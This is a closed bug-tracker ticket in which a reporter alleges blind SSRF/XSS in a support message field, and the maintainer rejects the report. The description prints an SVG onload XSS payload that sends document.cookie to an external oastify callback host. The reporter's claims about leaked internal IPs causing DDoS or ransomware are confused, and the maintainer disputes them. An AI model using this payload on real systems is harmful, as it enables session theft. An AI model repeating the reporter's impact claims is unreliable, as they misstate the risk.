- Status Closed
-
Assigned To
cbay - Private
Opened by Gowt - 08.09.2025
Last edited by cbay - 08.09.2025
FS#210 - Blind SSRF Vulnerability in the support field and Message endpoint
Description:- The vulnerability being demonstrated is Blind Cross-Site Scripting (Blind XSS), a subset of stored XSS, where an attacker injects a malicious script (like an SVG onload payload) that is stored by the application and executed in a different context—usually when viewed by an unsuspecting party, such as an administrator or support user.
Payload:- car’”?><svg/onload=“fetch(’https://adr0y18zp382qw4i8tqpvsj3eukl8gw5.oastify.com?cookie='+document.cookie)">%22%3E) —> see it shows the hyperlink to click by any support assitance employ it would leak the ip of internal organization and attacker can perform the DDOS or access to internal data by endpoints.
Blind XSS: This occurs when the injected payload is stored and only triggers execution out-of-band (not in the attacker’s immediate session), typically when accessed or rendered by someone else, such as through an admin dashboard or email notification.
The payload (<svg/onload=…>) abuses SVG tags to execute JavaScript, exfiltrating sensitive data like cookies to an external domain controlled by the attacker.
Impact;- The script executes when the comment is rendered, sending the victim’s IP address and cookie to the attacker’s Burp Collaborator or a similar endpoint, as observed in Burp Suite.
Because the attacker does not immediately see the results, but instead receives a callback containing the stolen data, this is specifically termed “blind” XSS.
Video link :- https://drive.google.com/file/d/10N9lspffD9loJaEQMxoK0ikdWoDwU9Xc/view?usp=sharing
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
That's not true, we can even see in your video that you do click on the link.
Kind regards,
Cyril
yes i clicked what if you sir or support team unfortunately clicked the link then the internal ip of organization is leaked which cause the DDOS attack to cause server Downtime or we can use the ip to make unauthorized requests to server and cloud resources by the attacker.
Attacker can make same process to create the malicious link and can make the support team to click on it via social engineering attack and also cause ransomware attacks by this process.
It has nothing to do with SSRF or XSS. Yes, if we do click on a user-supplied link, it will "leak" our own IP. That's how the web (and Internet) works.
Its not the your ip "leaks" your system ip leaks and can also a vulnerable to organization for your internal ip or your Ip leaks so the attacker can use your leaked ip and make unauthorized requests so that the server thinks the ip is form authorised ip and internal organization ip and so attacker can access to sensitive information from the organization server.